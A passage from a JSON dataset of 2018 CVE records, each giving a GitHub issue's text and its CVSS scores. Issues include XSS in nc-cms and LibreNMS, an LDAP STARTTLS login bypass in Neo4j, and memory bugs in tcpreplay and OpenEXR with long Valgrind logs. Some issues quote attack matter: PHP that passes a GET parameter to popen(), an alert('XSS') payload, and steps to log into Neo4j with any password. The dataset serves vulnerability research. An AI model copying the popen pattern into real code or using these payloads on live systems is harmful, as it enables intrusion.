  27030. "CVE_ID": "CVE-2018-18320",
  27031. "Issue_Url_old": "https://github.com/qoli/Merlin.PHP/issues/26",
  27032. "Issue_Url_new": "https://github.com/qoli/merlin.php/issues/26",
  27033. "Repo_new": "qoli/merlin.php",
  27034. "Issue_Created_At": "2018-10-11T08:58:17Z",
  27035. "description": "\u5b89\u5168\u95ee\u9898 \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e. APITAG popen\u51fd\u6570\u5bfc\u81f4\u547d\u4ee4\u6267\u884c\u3002 $c = _GET('command', 'unknow'); $handle = popen($c, \"r\"); \u6f0f\u6d1e\u8be6\u60c5\u8bf7\u53c2\u8003\uff1a URLTAG poc\uff1a APITAG",
  27036. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27037. "severity": "CRITICAL",
  27038. "baseScore": 9.8,
  27039. "impactScore": 5.9,
  27040. "exploitabilityScore": 3.9
  27041. },
  27042. {
  27043. "CVE_ID": "CVE-2018-18361",
  27044. "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/10",
  27045. "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/10",
  27046. "Repo_new": "gnat/nc-cms",
  27047. "Issue_Created_At": "2018-10-15T08:48:57Z",
  27048. "description": "nc cms Cross Site Scripting . Hello, I found that this cms may have some security problem you can edit your html on URLTAG and you can Input any evil js you want URLTAG FILETAG",
  27049. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27050. "severity": "MEDIUM",
  27051. "baseScore": 6.1,
  27052. "impactScore": 2.7,
  27053. "exploitabilityScore": 2.8
  27054. },
  27055. {
  27056. "CVE_ID": "CVE-2018-18385",
  27057. "Issue_Url_old": "https://github.com/asciidoctor/asciidoctor/issues/2888",
  27058. "Issue_Url_new": "https://github.com/asciidoctor/asciidoctor/issues/2888",
  27059. "Repo_new": "asciidoctor/asciidoctor",
  27060. "Issue_Created_At": "2018-09-26T08:51:58Z",
  27061. "description": "Infinite loop in Parser next_block. This is another bug found with the fuzzer. With specific input it's possible to cause an infinite loop in the APITAG method when parsing an asciidoctor file, due to a never-breaking while true statement. I think this bug should be prioritized since it can cause a denial of service in programs that rely on asciidoctor. Specifically APITAG is safe since it uses aggressive timeouts in its markup process, although I did later get a NUMBERTAG error on the APITAG main page for a few hours that I've never seen before. I can't tell if it's related or not. Example input APITAG And also APITAG Explanation In the APITAG method there is a while true statement that is used for flow control, and meant to execute only once according to its documentation. I provide no PR since I am not sure what is missing from the loop logic. Plus, I personally think it would be good practice to rewrite this and eliminate the use of an infinite loop especially since it is only used for flow control.",
  27062. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  27063. "severity": "HIGH",
  27064. "baseScore": 7.5,
  27065. "impactScore": 3.6,
  27066. "exploitabilityScore": 3.9
  27067. },
  27068. {
  27069. "CVE_ID": "CVE-2018-18389",
  27070. "Issue_Url_old": "https://github.com/neo4j/neo4j/issues/12047",
  27071. "Issue_Url_new": "https://github.com/neo4j/neo4j/issues/12047",
  27072. "Repo_new": "neo4j/neo4j",
  27073. "Issue_Created_At": "2018-10-05T15:19:31Z",
  27074. "description": "Using STARTTLS breaks LDAP authentication. Abstract I discovered that when I configure the LDAP Auth Provider to use STARTTLS authentication is broken, i.e. I can log into the Neo4j instance with any existing user account using arbitrary passwords. Unencrypted LDAP connections (without STARTTLS) and LDAPS connections are not affected. Neo4j version NUMBERTAG enterprise (also reproduced with NUMBERTAG enterprise) Operating system: Alpine (via Docker) APITAG ? Steps to reproduce NUMBERTAG Create APITAG : yaml version NUMBERTAG services: openldap: image: osixia/openldap NUMBERTAG ports NUMBERTAG environment: LDAP_BASE_DN= LDAP_READONLY_USER=true APITAG APITAG LDAP_TLS_VERIFY_CLIENT=try APITAG APITAG APITAG volumes: PATHTAG PATHTAG command: copy service neo4j: image: neo4j NUMBERTAG enterprise ports NUMBERTAG environment: APITAG volumes: PATHTAG PATHTAG PATHTAG NUMBERTAG Pull Docker images: APITAG NUMBERTAG Create APITAG : ERRORTAG NUMBERTAG Create certificates and truststore CODETAG NUMBERTAG Create APITAG : CODETAG NUMBERTAG Create logs directory: mkdir logs NUMBERTAG APITAG NUMBERTAG erify STARTTLS works and account alice exists: APITAG Corresponding LDAP log: ERRORTAG NUMBERTAG Open Neo4J in your browser at APITAG and login using the account alice and the password bob Expected behavior Login fails with error message ERRORTAG Actual behavior Login succeeds.",
  27075. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27076. "severity": "CRITICAL",
  27077. "baseScore": 9.8,
  27078. "impactScore": 5.9,
  27079. "exploitabilityScore": 3.9
  27080. },
  27081. {
  27082. "CVE_ID": "CVE-2018-18407",
  27083. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/488",
  27084. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/488",
  27085. "Repo_new": "appneta/tcpreplay",
  27086. "Issue_Created_At": "2018-10-15T15:58:43Z",
  27087. "description": "Heap overflow in APITAG A heap based buffer overflow was discovered in tcpreplay edit binary, during the incremental checksum operation. The issue is being triggered in the function APITAG at APITAG , invoked by APITAG in APITAG . Tested version NUMBERTAG Command: tcpreplay edit portmap NUMBERTAG seed NUMBERTAG APITAG intf1=eno1 intf2=eno3 decode=some preload pcap verbose $POC Debugging: ERRORTAG ERRORTAG ASAN Report ERRORTAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
  27088. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27089. "severity": "MEDIUM",
  27090. "baseScore": 5.5,
  27091. "impactScore": 3.6,
  27092. "exploitabilityScore": 1.8
  27093. },
  27094. {
  27095. "CVE_ID": "CVE-2018-18408",
  27096. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/489",
  27097. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/489",
  27098. "Repo_new": "appneta/tcpreplay",
  27099. "Issue_Created_At": "2018-10-15T16:32:35Z",
  27100. "description": "Use after free in APITAG . A heap use after free issue exists in tcpbridge binary of tcpreplay, being triggered in function APITAG at file APITAG . Tested version NUMBERTAG Command: tcpbridge intf1=en7 Debugging ERRORTAG APITAG ASAN Report ERRORTAG No reproducer file required.",
  27101. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27102. "severity": "CRITICAL",
  27103. "baseScore": 9.8,
  27104. "impactScore": 5.9,
  27105. "exploitabilityScore": 3.9
  27106. },
  27107. {
  27108. "CVE_ID": "CVE-2018-18422",
  27109. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/8",
  27110. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/8",
  27111. "Repo_new": "yanchongchong/swallow",
  27112. "Issue_Created_At": "2018-10-16T06:54:47Z",
  27113. "description": "APITAG CODETAG",
  27114. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27115. "severity": "HIGH",
  27116. "baseScore": 8.8,
  27117. "impactScore": 5.9,
  27118. "exploitabilityScore": 2.8
  27119. },
  27120. {
  27121. "CVE_ID": "CVE-2018-18434",
  27122. "Issue_Url_old": "https://github.com/linlinjava/litemall/issues/76",
  27123. "Issue_Url_new": "https://github.com/linlinjava/litemall/issues/76",
  27124. "Repo_new": "linlinjava/litemall",
  27125. "Issue_Created_At": "2018-10-12T07:37:33Z",
  27126. "description": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e. \u60a8\u597d: APITAG APITAG FILETAG APITAG",
  27127. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  27128. "severity": "HIGH",
  27129. "baseScore": 7.5,
  27130. "impactScore": 3.6,
  27131. "exploitabilityScore": 3.9
  27132. },
  27133. {
  27134. "CVE_ID": "CVE-2018-18443",
  27135. "Issue_Url_old": "https://github.com/openexr/openexr/issues/350",
  27136. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/350",
  27137. "Repo_new": "academysoftwarefoundation/openexr",
  27138. "Issue_Created_At": "2018-10-17T12:48:54Z",
  27139. "description": "heap buffer overflow. Hello APITAG team, I have identified an issue affecting APITAG by using AFL fuzz. root APITAG valgrind v tool=memcheck leak check=full exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG algrind options NUMBERTAG tool=memcheck NUMBERTAG leak check=full NUMBERTAG Contents of /proc/version NUMBERTAG Linux version NUMBERTAG kali1 amd NUMBERTAG EMAILTAG rg) (gcc version NUMBERTAG APITAG NUMBERTAG SMP Debian NUMBERTAG kali NUMBERTAG Arch and hwcaps: AMD NUMBERTAG APITAG amd NUMBERTAG c NUMBERTAG lzcnt rdtscp sse3 avx a NUMBERTAG bmi NUMBERTAG Page sizes: currently NUMBERTAG max supported NUMBERTAG algrind library directory: PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG f3df wanted NUMBERTAG e0f NUMBERTAG c NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG object doesn't have a dynamic symbol table NUMBERTAG Scheduler: using generic scheduler lock implementation NUMBERTAG Reading suppressions file: PATHTAG NUMBERTAG embedded gdbserver: reading from /tmp/vgdb pipe from vgdb to NUMBERTAG by root on NUMBERTAG embedded gdbserver: writing to /tmp/vgdb pipe to vgdb from NUMBERTAG by root on NUMBERTAG embedded gdbserver: shared mem /tmp/vgdb pipe shared mem vgdb NUMBERTAG by root on NUMBERTAG TO CONTROL THIS PROCESS USING vgdb (which you probably NUMBERTAG don't want to do, unless you know exactly what you're doing NUMBERTAG or are doing some strange experiment NUMBERTAG PATHTAG pid NUMBERTAG command NUMBERTAG TO DEBUG THIS PROCESS USING GDB: start 
GDB like this NUMBERTAG PATHTAG exrmultiview NUMBERTAG and then give GDB the following command NUMBERTAG target remote | PATHTAG pid NUMBERTAG pid is optional if only one valgrind process is running NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG strlen) redirected to NUMBERTAG APITAG NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG index) redirected to NUMBERTAG b APITAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a2a NUMBERTAG wanted NUMBERTAG c7eb NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a NUMBERTAG wanted NUMBERTAG af NUMBERTAG a NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG WARNING: new redirection conflicts with existing ignoring it NUMBERTAG old NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG APITAG NUMBERTAG new NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG a NUMBERTAG strlen NUMBERTAG REDIR NUMBERTAG aab0 (ld linu NUMBERTAG so NUMBERTAG strcmp) redirected to NUMBERTAG b NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG e7d0 (ld linu NUMBERTAG so NUMBERTAG mempcpy) redirected to NUMBERTAG d1a0 (mempcpy NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG REDIR NUMBERTAG APITAG 
redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fcd0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ff0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ab NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fdb0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fc0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG 
b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG e0 (rinde NUMBERTAG REDIR NUMBERTAG c5c0 APITAG redirected to NUMBERTAG malloc NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG a0 (strlen NUMBERTAG REDIR NUMBERTAG fee0 APITAG redirected to NUMBERTAG bab0 (bcmp NUMBERTAG REDIR NUMBERTAG f0a0 APITAG redirected to NUMBERTAG a NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG d2a0 APITAG redirected to NUMBERTAG calloc NUMBERTAG REDIR NUMBERTAG e NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memmove NUMBERTAG REDIR NUMBERTAG af NUMBERTAG APITAG new(unsigned long)) redirected to NUMBERTAG dc0 (operator new(unsigned long NUMBERTAG REDIR NUMBERTAG APITAG delete(void )) redirected to NUMBERTAG e NUMBERTAG operator delete(void NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG strncpy NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG d NUMBERTAG strstr_sse NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG new ](unsigned long)) redirected to NUMBERTAG e0 (operator APITAG long NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG strncmp_sse NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memset NUMBERTAG REDIR NUMBERTAG df NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG posix_memalign NUMBERTAG REDIR NUMBERTAG APITAG delete[ void ) redirected to NUMBERTAG operator delete FILETAG Version openexr NUMBERTAG Found by:TAN JIE",
  27140. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  27141. "severity": "MEDIUM",
  27142. "baseScore": 4.3,
  27143. "impactScore": 1.4,
  27144. "exploitabilityScore": 2.8
  27145. },
  27146. {
  27147. "CVE_ID": "CVE-2018-18444",
  27148. "Issue_Url_old": "https://github.com/openexr/openexr/issues/351",
  27149. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/351",
  27150. "Repo_new": "academysoftwarefoundation/openexr",
  27151. "Issue_Created_At": "2018-10-17T12:59:22Z",
  27152. "description": "Out of Memory . Hello APITAG team, I have identified an issue affecting APITAG by using AFL fuzz. root APITAG exrmultiview left PATHTAG right APITAG NUMBERTAG exr exrmultiview: APITAG _int_malloc: Assertion `(unsigned long) (size) >= (unsigned long) (nb)' failed. Aborted root APITAG valgrind v tool=memcheck leak check=full exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: exrmultiview left PATHTAG right APITAG NUMBERTAG exr NUMBERTAG algrind options NUMBERTAG tool=memcheck NUMBERTAG leak check=full NUMBERTAG Contents of /proc/version NUMBERTAG Linux version NUMBERTAG kali1 amd NUMBERTAG EMAILTAG rg) (gcc version NUMBERTAG APITAG NUMBERTAG SMP Debian NUMBERTAG kali NUMBERTAG Arch and hwcaps: AMD NUMBERTAG APITAG amd NUMBERTAG c NUMBERTAG lzcnt rdtscp sse3 avx a NUMBERTAG bmi NUMBERTAG Page sizes: currently NUMBERTAG max supported NUMBERTAG algrind library directory: PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG f3df wanted NUMBERTAG e0f NUMBERTAG c NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG object doesn't have a dynamic symbol table NUMBERTAG Scheduler: using generic scheduler lock implementation NUMBERTAG Reading suppressions file: PATHTAG NUMBERTAG embedded gdbserver: reading from /tmp/vgdb pipe from vgdb to NUMBERTAG by root on NUMBERTAG embedded gdbserver: writing to /tmp/vgdb pipe to vgdb from NUMBERTAG by root on NUMBERTAG embedded gdbserver: shared mem /tmp/vgdb pipe shared mem vgdb NUMBERTAG by root on NUMBERTAG TO CONTROL THIS PROCESS USING vgdb (which you probably NUMBERTAG don't want to do, unless you 
know exactly what you're doing NUMBERTAG or are doing some strange experiment NUMBERTAG PATHTAG pid NUMBERTAG command NUMBERTAG TO DEBUG THIS PROCESS USING GDB: start GDB like this NUMBERTAG PATHTAG exrmultiview NUMBERTAG and then give GDB the following command NUMBERTAG target remote | PATHTAG pid NUMBERTAG pid is optional if only one valgrind process is running NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG strlen) redirected to NUMBERTAG APITAG NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG index) redirected to NUMBERTAG b APITAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a2a NUMBERTAG wanted NUMBERTAG c7eb NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a NUMBERTAG wanted NUMBERTAG af NUMBERTAG a NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG WARNING: new redirection conflicts with existing ignoring it NUMBERTAG old NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG APITAG NUMBERTAG new NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG a NUMBERTAG strlen NUMBERTAG REDIR NUMBERTAG aab0 (ld linu NUMBERTAG so NUMBERTAG strcmp) redirected to NUMBERTAG b NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG e7d0 (ld linu NUMBERTAG so NUMBERTAG mempcpy) redirected to NUMBERTAG d1a0 (mempcpy NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG 
object doesn't have a symbol table NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fcd0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ff0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG ab NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fdb0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG fc0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG 
redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG e0 (rinde NUMBERTAG REDIR NUMBERTAG c5c0 APITAG redirected to NUMBERTAG malloc NUMBERTAG REDIR NUMBERTAG d0 APITAG redirected to NUMBERTAG a0 (strlen NUMBERTAG REDIR NUMBERTAG fee0 APITAG redirected to NUMBERTAG bab0 (bcmp NUMBERTAG REDIR NUMBERTAG f0a0 APITAG redirected to NUMBERTAG a NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG d2a0 APITAG redirected to NUMBERTAG calloc NUMBERTAG REDIR NUMBERTAG e NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memmove NUMBERTAG REDIR NUMBERTAG af NUMBERTAG APITAG new(unsigned long)) redirected to NUMBERTAG dc0 (operator new(unsigned long NUMBERTAG REDIR NUMBERTAG APITAG delete(void )) redirected to NUMBERTAG e NUMBERTAG operator delete(void NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG strncpy NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG d NUMBERTAG strstr_sse NUMBERTAG REDIR NUMBERTAG b NUMBERTAG APITAG new ](unsigned long)) redirected to NUMBERTAG e0 (operator APITAG long NUMBERTAG REDIR NUMBERTAG a NUMBERTAG APITAG redirected to NUMBERTAG strncmp_sse NUMBERTAG REDIR NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG memset NUMBERTAG REDIR NUMBERTAG df NUMBERTAG APITAG redirected to NUMBERTAG c NUMBERTAG posix_memalign NUMBERTAG REDIR NUMBERTAG APITAG delete[ void ) redirected to NUMBERTAG operator delete FILETAG Version openexr NUMBERTAG Found by:TAN JIE",
  27153. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27154. "severity": "HIGH",
  27155. "baseScore": 8.8,
  27156. "impactScore": 5.9,
  27157. "exploitabilityScore": 2.8
  27158. },
  27159. {
  27160. "CVE_ID": "CVE-2018-18478",
  27161. "Issue_Url_old": "https://github.com/librenms/librenms/issues/9170",
  27162. "Issue_Url_new": "https://github.com/librenms/librenms/issues/9170",
  27163. "Repo_new": "librenms/librenms",
  27164. "Issue_Created_At": "2018-09-07T23:45:41Z",
  27165. "description": "[SECURITY] Persistent Cross Site Scripting (XSS). Hi, the dashboard_name parameter is vulnerable to Persistent Cross Site Scripting attacks through POST requests to the FILETAG resource. This vulnerability allows remote attackers to inject arbitrary web script or HTML. Proof of concept APITAG Click on New Dashboard (+) and enter the payload \" APITAG alert('XSS APITAG APITAG \" in the name field. Greetings!",
  27166. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  27167. "severity": "MEDIUM",
  27168. "baseScore": 6.1,
  27169. "impactScore": 2.7,
  27170. "exploitabilityScore": 2.8
  27171. },
  27172. {
  27173. "CVE_ID": "CVE-2018-18482",
  27174. "Issue_Url_old": "https://github.com/lfittl/libpg_query/issues/49",
  27175. "Issue_Url_new": "https://github.com/pganalyze/libpg_query/issues/49",
  27176. "Repo_new": "pganalyze/libpg_query",
  27177. "Issue_Created_At": "2018-09-28T06:46:14Z",
  27178. "description": "Memory leak in APITAG Hi, I compiled 'parse_plpgsql.c' and tested it with file APITAG APITAG, and valgrind found a memory leak in APITAG ERRORTAG ERRORTAG After debugging with gdb, it seems APITAG is not freed correctly when parsing APITAG (function APITAG is not called.)",
  27179. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  27180. "severity": "MEDIUM",
  27181. "baseScore": 6.5,
  27182. "impactScore": 3.6,
  27183. "exploitabilityScore": 2.8
  27184. },
  27185. {
  27186. "CVE_ID": "CVE-2018-18531",
  27187. "Issue_Url_old": "https://github.com/penggle/kaptcha/issues/3",
  27188. "Issue_Url_new": "https://github.com/penggle/kaptcha/issues/3",
  27189. "Repo_new": "penggle/kaptcha",
  27190. "Issue_Created_At": "2018-10-18T02:18:47Z",
  27191. "description": "Insecure Random. URLTAG I think it should use a secure random algorithm APITAG An attacker will simply compute the seed from the observed output values. This takes significantly less time than NUMBERTAG in the case of APITAG It has been shown that you can predict future Random outputs by observing only two(!) output values in time roughly NUMBERTAG",
  27192. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  27193. "severity": "CRITICAL",
  27194. "baseScore": 9.8,
  27195. "impactScore": 5.9,
  27196. "exploitabilityScore": 3.9
  27197. },
  27198. {
  27199. "CVE_ID": "CVE-2018-18544",
  27200. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1360",
  27201. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1360",
